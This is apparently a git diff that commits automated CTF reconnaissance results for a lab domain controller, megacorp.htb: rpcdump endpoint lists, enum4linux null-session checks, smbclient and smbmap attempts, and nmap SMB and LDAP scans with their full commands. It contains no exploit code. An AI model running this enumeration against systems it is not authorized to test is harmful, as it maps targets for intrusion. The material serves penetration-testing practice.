ncacn_np:\\DC[\pipe\lsass] + +Protocol: N/A +Provider: N/A +UUID : 8FB74744-B2FF-4C00-BE0D-9EF9A191FE1B v1.0 Ngc Pop Key Service +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: N/A +Provider: N/A +UUID : B25A52BF-E5DD-4F4A-AEA6-8CA7272A0E86 v2.0 KeyIso +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-NRPC]: Netlogon Remote Protocol +Provider: netlogon.dll +UUID : 12345678-1234-ABCD-EF00-01234567CFFB v1.0 +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-RAA]: Remote Authorization API Protocol +Provider: N/A +UUID : 0B1C2170-5732-4E0E-8CD3-D9B16F3B84D7 v0.0 RemoteAccessCheck +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-LSAT]: Local Security Authority (Translation Methods) Remote +Provider: lsasrv.dll +UUID : 12345778-1234-ABCD-EF00-0123456789AB v0.0 +Bindings: + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-DRSR]: Directory Replication Service (DRS) Remote Protocol +Provider: ntdsai.dll +UUID : E3514235-4B06-11D1-AB04-00C04FC2DCD2 v4.0 MS NT Directory DRS Interface +Bindings: + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-SAMR]: Security Account Manager (SAM) Remote Protocol +Provider: samsrv.dll +UUID : 12345778-1234-ABCD-EF00-0123456789AC v1.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: N/A +Provider: N/A +UUID : 1A0D010F-1C33-432C-B0F5-8CF4E8053099 v1.0 IdSegSrv service +Bindings: + ncalrpc:[LRPC-f4293e3b5b9ae5cb28] + +Protocol: N/A +Provider: srvsvc.dll +UUID : 98716D03-89AC-44C7-BB8C-285824E51C4A v1.0 XactSrv service +Bindings: + ncalrpc:[LRPC-f4293e3b5b9ae5cb28] + +Protocol: N/A +Provider: sysmain.dll +UUID : B58AA02E-2884-4E97-8176-4EE06D794184 v1.0 +Bindings: + ncalrpc:[LRPC-6ba6be7619ad5499b5] + +Protocol: N/A +Provider: N/A +UUID : DF4DF73A-C52D-4E3A-8003-8437FDF8302A v0.0 WM_WindowManagerRPC\Server +Bindings: + ncalrpc:[LRPC-e9c9cb51676dd7958e] + +Protocol: N/A +Provider: IKEEXT.DLL +UUID : A398E520-D59A-4BDD-AA7A-3C1E0303A511 v1.0 IKE/Authip API +Bindings: + ncalrpc:[LRPC-a6cbf0f8554ac2dd0e] + +Protocol: N/A +Provider: N/A +UUID : 650A7E26-EAB8-5533-CE43-9C1DFCE11511 v1.0 Vpn APIs +Bindings: + ncalrpc:[LRPC-78511121f1275f430c] + ncalrpc:[VpnikeRpc] + ncalrpc:[RasmanLrpc] + ncacn_np:\\DC[\PIPE\ROUTER] + +Protocol: [MS-SCMR]: Service Control Manager Remote Protocol +Provider: services.exe +UUID : 367ABB81-9844-35F1-AD32-98F038001003 v2.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49678] + +Protocol: [MS-CMPO]: MSDTC Connection Manager: +Provider: msdtcprx.dll +UUID : 906B0CE0-C70B-1067-B317-00DD010662DA v1.0 +Bindings: + ncalrpc:[LRPC-3bcaafee1590c0de20] + ncalrpc:[OLE17B51056E4D45A611212712C1451] + ncalrpc:[LRPC-9c5b8ea96b2f264739] + ncalrpc:[LRPC-9c5b8ea96b2f264739] + ncalrpc:[LRPC-9c5b8ea96b2f264739] + +Protocol: N/A +Provider: N/A +UUID : F3F09FFD-FBCF-4291-944D-70AD6E0E73BB v1.0 +Bindings: + ncalrpc:[LRPC-802031e034c1f025bd] + +Protocol: [MS-DNSP]: Domain Name Service (DNS) Server Management +Provider: dns.exe +UUID : 50ABC2A4-574D-40B3-9D66-EE4FD5FBA076 v5.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49695] + +Protocol: [MS-FRS2]: Distributed File System Replication Protocol +Provider: dfsrmig.exe +UUID : 897E2E5F-93F3-4376-9C9C-FD2277495C27 v1.0 Frs2 Service +Bindings: + ncacn_ip_tcp:10.129.243.131[49843] + ncalrpc:[OLECF74F747061ABA28294F2BDC6FF0] + +Protocol: N/A +Provider: N/A +UUID : BF4DC912-E52F-4904-8EBE-9317C1BDD497 v1.0 +Bindings: + ncalrpc:[LRPC-92939372b55364a6c8] + ncalrpc:[OLE9D9AB6AB4D22AD38C10DD1548060] + +[*] Received 405 endpoints. + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml new file mode 100644 index 00000000..6f81964a --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml @@ -0,0 +1,36 @@ + + + + + + + + + + + + + + + + + + + + + +
+ + + +cpe:/o:microsoft:windows + + + + + + + + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/enum4linux.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/enum4linux.txt new file mode 100644 index 00000000..84e5c972 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/enum4linux.txt @@ -0,0 +1,139 @@ +Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Oct 28 14:27:53 2023 + + =========================================( Target Information )========================================= + +Target ........... 10.129.243.131 +RID Range ........ 500-550,1000-1050 +Username ......... '' +Password ......... '' +Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none + + + ===========================( Enumerating Workgroup/Domain on 10.129.243.131 )=========================== + + +[E] Can't find workgroup/domain + + + + ===============================( Nbtstat Information for 10.129.243.131 )=============================== + +Looking up status of 10.129.243.131 +No reply from 10.129.243.131 + + ==================================( Session Check on 10.129.243.131 )================================== + + +[+] Server 10.129.243.131 allows sessions using username '', password '' + + + ==========================( Getting information via LDAP for 10.129.243.131 )========================== + + +[+] 10.129.243.131 appears to be a child DC + + + ===============================( Getting domain SID for 10.129.243.131 )=============================== + +Domain Name: MEGACORP +Domain Sid: S-1-5-21-855300830-391258870-456067225 + +[+] Host is part of a domain (not a workgroup) + + + ==================================( OS information on 10.129.243.131 )================================== + + +[E] Can't get OS info with smbclient + + +[+] Got OS info for 10.129.243.131 from srvinfo: +do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED + + + ======================================( Users on 10.129.243.131 )====================================== + + +[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED + + + +[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED + + + ===============================( Machine Enumeration on 10.129.243.131 )=============================== + + +[E] Not implemented in this version of enum4linux. + + + ================================( Share Enumeration on 10.129.243.131 )================================ + +do_connect: Connection to 10.129.243.131 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) + + Sharename Type Comment + --------- ---- ------- +Reconnecting with SMB1 for workgroup listing. +Unable to connect with SMB1 -- no workgroup available + +[+] Attempting to map shares on 10.129.243.131 + + + ===========================( Password Policy Information for 10.129.243.131 )=========================== + + +[E] Unexpected error from polenum: + + + +[+] Attaching to 10.129.243.131 using a NULL share + +[+] Trying protocol 139/SMB... + + [!] Protocol failed: Cannot request session (Called Name:10.129.243.131) + +[+] Trying protocol 445/SMB... + + [!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights. + + + +[E] Failed to get password policy with rpcclient + + + + ======================================( Groups on 10.129.243.131 )====================================== + + +[+] Getting builtin groups: + + +[+]  Getting builtin group memberships: + + +[+]  Getting local groups: + + +[+]  Getting local group memberships: + + +[+]  Getting domain groups: + + +[+]  Getting domain group memberships: + + + =================( Users on 10.129.243.131 via RID cycling (RIDS: 500-550,1000-1050) )================= + + +[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible. + + + ==============================( Getting printer info for 10.129.243.131 )============================== + +do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED + + +enum4linux complete on Sat Oct 28 14:28:33 2023 + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/nbtscan.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/nbtscan.txt new file mode 100644 index 00000000..8f23bc11 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/nbtscan.txt @@ -0,0 +1,3 @@ +Doing NBT name scan for addresses from 10.129.243.131 + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbclient.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbclient.txt new file mode 100644 index 00000000..af09fa1c --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbclient.txt @@ -0,0 +1,8 @@ +do_connect: Connection to 10.129.243.131 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) +Anonymous login successful + + Sharename Type Comment + --------- ---- ------- +Reconnecting with SMB1 for workgroup listing. +Unable to connect with SMB1 -- no workgroup available + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt new file mode 100644 index 00000000..d464d6d8 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt @@ -0,0 +1,3 @@ +[!] RPC Authentication error occurred +[!] Authentication error on 10.129.243.131 + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt new file mode 100644 index 00000000..d464d6d8 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt @@ -0,0 +1,3 @@ +[!] RPC Authentication error occurred +[!] Authentication error on 10.129.243.131 + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt new file mode 100644 index 00000000..d464d6d8 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt @@ -0,0 +1,3 @@ +[!] RPC Authentication error occurred +[!] Authentication error on 10.129.243.131 + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt new file mode 100644 index 00000000..aa448409 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt @@ -0,0 +1,22 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:27:53 2023 as: nmap -vv --reason -Pn -T4 -sV -p 139 "--script=banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set (0.036s latency). +Scanned at 2023-10-28 14:27:57 CEST for 41s + +PORT STATE SERVICE REASON VERSION +139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn +|_smb-enum-services: ERROR: Script execution failed (use -d to debug) +Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows + +Host script results: +|_smb2-time: ERROR: Script execution failed (use -d to debug) +|_smb-protocols: No dialects accepted. Something may be blocking the responses +|_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry! +|_smb-mbenum: ERROR: Script execution failed (use -d to debug) +|_smb2-capabilities: SMB: Couldn't find a NetBIOS name that works for the server. Sorry! +|_smb-vuln-ms10-061: SMB: Couldn't find a NetBIOS name that works for the server. Sorry! +|_smb-print-text: false + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:28:38 2023 -- 1 IP address (1 host up) scanned in 45.20 seconds diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml new file mode 100644 index 00000000..13cebdab --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml @@ -0,0 +1,43 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + +cpe:/o:microsoft:windows + + + + + + + + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt new file mode 100644 index 00000000..782b6b8b --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt @@ -0,0 +1,108 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:27:53 2023 as: nmap -vv --reason -Pn -T4 -sV -p 3268 "--script=banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set (0.050s latency). +Scanned at 2023-10-28 14:27:57 CEST for 17s + +PORT STATE SERVICE REASON VERSION +3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL, Site: Default-First-Site-Name) +| ldap-rootdse: +| LDAP Results +| +| domainFunctionality: 7 +| forestFunctionality: 7 +| domainControllerFunctionality: 7 +| rootDomainNamingContext: DC=MEGACORP,DC=LOCAL +| ldapServiceName: MEGACORP.LOCAL:dc$@MEGACORP.LOCAL +| isGlobalCatalogReady: TRUE +| supportedSASLMechanisms: GSSAPI +| supportedSASLMechanisms: GSS-SPNEGO +| supportedSASLMechanisms: EXTERNAL +| supportedSASLMechanisms: DIGEST-MD5 +| supportedLDAPVersion: 3 +| supportedLDAPVersion: 2 +| supportedLDAPPolicies: MaxPoolThreads +| supportedLDAPPolicies: MaxPercentDirSyncRequests +| supportedLDAPPolicies: MaxDatagramRecv +| supportedLDAPPolicies: MaxReceiveBuffer +| supportedLDAPPolicies: InitRecvTimeout +| supportedLDAPPolicies: MaxConnections +| supportedLDAPPolicies: MaxConnIdleTime +| supportedLDAPPolicies: MaxPageSize +| supportedLDAPPolicies: MaxBatchReturnMessages +| supportedLDAPPolicies: MaxQueryDuration +| supportedLDAPPolicies: MaxDirSyncDuration +| supportedLDAPPolicies: MaxTempTableSize +| supportedLDAPPolicies: MaxResultSetSize +| supportedLDAPPolicies: MinResultSets +| supportedLDAPPolicies: MaxResultSetsPerConn +| supportedLDAPPolicies: MaxNotificationPerConn +| supportedLDAPPolicies: MaxValRange +| supportedLDAPPolicies: MaxValRangeTransitive +| supportedLDAPPolicies: ThreadMemoryLimit +| supportedLDAPPolicies: SystemMemoryLimitPercent +| supportedControl: 1.2.840.113556.1.4.319 +| supportedControl: 1.2.840.113556.1.4.801 +| supportedControl: 1.2.840.113556.1.4.473 +| supportedControl: 1.2.840.113556.1.4.528 +| supportedControl: 1.2.840.113556.1.4.417 +| supportedControl: 1.2.840.113556.1.4.619 +| supportedControl: 1.2.840.113556.1.4.841 +| supportedControl: 1.2.840.113556.1.4.529 +| supportedControl: 1.2.840.113556.1.4.805 +| supportedControl: 1.2.840.113556.1.4.521 +| supportedControl: 1.2.840.113556.1.4.970 +| supportedControl: 1.2.840.113556.1.4.1338 +| supportedControl: 1.2.840.113556.1.4.474 +| supportedControl: 1.2.840.113556.1.4.1339 +| supportedControl: 1.2.840.113556.1.4.1340 +| supportedControl: 1.2.840.113556.1.4.1413 +| supportedControl: 2.16.840.1.113730.3.4.9 +| supportedControl: 2.16.840.1.113730.3.4.10 +| supportedControl: 1.2.840.113556.1.4.1504 +| supportedControl: 1.2.840.113556.1.4.1852 +| supportedControl: 1.2.840.113556.1.4.802 +| supportedControl: 1.2.840.113556.1.4.1907 +| supportedControl: 1.2.840.113556.1.4.1948 +| supportedControl: 1.2.840.113556.1.4.1974 +| supportedControl: 1.2.840.113556.1.4.1341 +| supportedControl: 1.2.840.113556.1.4.2026 +| supportedControl: 1.2.840.113556.1.4.2064 +| supportedControl: 1.2.840.113556.1.4.2065 +| supportedControl: 1.2.840.113556.1.4.2066 +| supportedControl: 1.2.840.113556.1.4.2090 +| supportedControl: 1.2.840.113556.1.4.2205 +| supportedControl: 1.2.840.113556.1.4.2204 +| supportedControl: 1.2.840.113556.1.4.2206 +| supportedControl: 1.2.840.113556.1.4.2211 +| supportedControl: 1.2.840.113556.1.4.2239 +| supportedControl: 1.2.840.113556.1.4.2255 +| supportedControl: 1.2.840.113556.1.4.2256 +| supportedControl: 1.2.840.113556.1.4.2309 +| supportedControl: 1.2.840.113556.1.4.2330 +| supportedControl: 1.2.840.113556.1.4.2354 +| supportedCapabilities: 1.2.840.113556.1.4.800 +| supportedCapabilities: 1.2.840.113556.1.4.1670 +| supportedCapabilities: 1.2.840.113556.1.4.1791 +| supportedCapabilities: 1.2.840.113556.1.4.1935 +| supportedCapabilities: 1.2.840.113556.1.4.2080 +| supportedCapabilities: 1.2.840.113556.1.4.2237 +| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=MEGACORP,DC=LOCAL +| serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=MEGACORP,DC=LOCAL +| schemaNamingContext: CN=Schema,CN=Configuration,DC=MEGACORP,DC=LOCAL +| namingContexts: DC=MEGACORP,DC=LOCAL +| namingContexts: CN=Configuration,DC=MEGACORP,DC=LOCAL +| namingContexts: CN=Schema,CN=Configuration,DC=MEGACORP,DC=LOCAL +| namingContexts: DC=DomainDnsZones,DC=MEGACORP,DC=LOCAL +| namingContexts: DC=ForestDnsZones,DC=MEGACORP,DC=LOCAL +| isSynchronized: TRUE +| highestCommittedUSN: 77897 +| dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=MEGACORP,DC=LOCAL +| dnsHostName: DC.MEGACORP.LOCAL +| defaultNamingContext: DC=MEGACORP,DC=LOCAL +| currentTime: 20231028122804.0Z +|_ configurationNamingContext: CN=Configuration,DC=MEGACORP,DC=LOCAL +Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:28:14 2023 -- 1 IP address (1 host up) scanned in 21.16 seconds diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml new file mode 100644 index 00000000..655d97ee --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml @@ -0,0 +1,42 @@ + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + +cpe:/o:microsoft:windows + + + + + + + + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp593/tcp_593_rpc_rpcdump.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp593/tcp_593_rpc_rpcdump.txt new file mode 100644 index 00000000..51fd1598 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp593/tcp_593_rpc_rpcdump.txt @@ -0,0 +1,880 @@ +Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation + +[*] Retrieving endpoint list from 10.129.243.131 +Protocol: [MS-RSP]: Remote Shutdown Protocol +Provider: wininit.exe +UUID : D95AFE70-A6D5-4259-822E-2C84DA1DDB0D v1.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49664] + ncalrpc:[WindowsShutdown] + ncacn_np:\\DC[\PIPE\InitShutdown] + ncalrpc:[WMsgKRpc089280] + +Protocol: N/A +Provider: winlogon.exe +UUID : 76F226C3-EC14-4325-8A99-6A46348418AF v1.0 +Bindings: + ncalrpc:[WindowsShutdown] + ncacn_np:\\DC[\PIPE\InitShutdown] + ncalrpc:[WMsgKRpc089280] + ncalrpc:[WMsgKRpc08A621] + +Protocol: N/A +Provider: N/A +UUID : D09BDEB5-6171-4A34-BFE2-06FA82652568 v1.0 +Bindings: + ncalrpc:[csebpub] + ncalrpc:[LRPC-6b54d635557b62ca53] + ncalrpc:[LRPC-e71821bbfb97e6ac17] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + ncalrpc:[LRPC-e71821bbfb97e6ac17] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + ncalrpc:[LRPC-9e83194e1e5674c55f] + ncalrpc:[LRPC-a91e72435259adddfa] + +Protocol: N/A +Provider: N/A +UUID : 697DCDA9-3BA9-4EB2-9247-E11F1901B0D2 v1.0 +Bindings: + ncalrpc:[LRPC-6b54d635557b62ca53] + ncalrpc:[LRPC-e71821bbfb97e6ac17] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 9B008953-F195-4BF9-BDE0-4471971E58ED v1.0 +Bindings: + ncalrpc:[LRPC-e71821bbfb97e6ac17] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : DD59071B-3215-4C59-8481-972EDADC0F6A v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 0D47017B-B33B-46AD-9E18-FE96456C5078 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 95406F0B-B239-4318-91BB-CEA3A46FF0DC v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 4ED8ABCC-F1E2-438B-981F-BB0E8ABC010C v1.0 +Bindings: + ncalrpc:[umpo] + 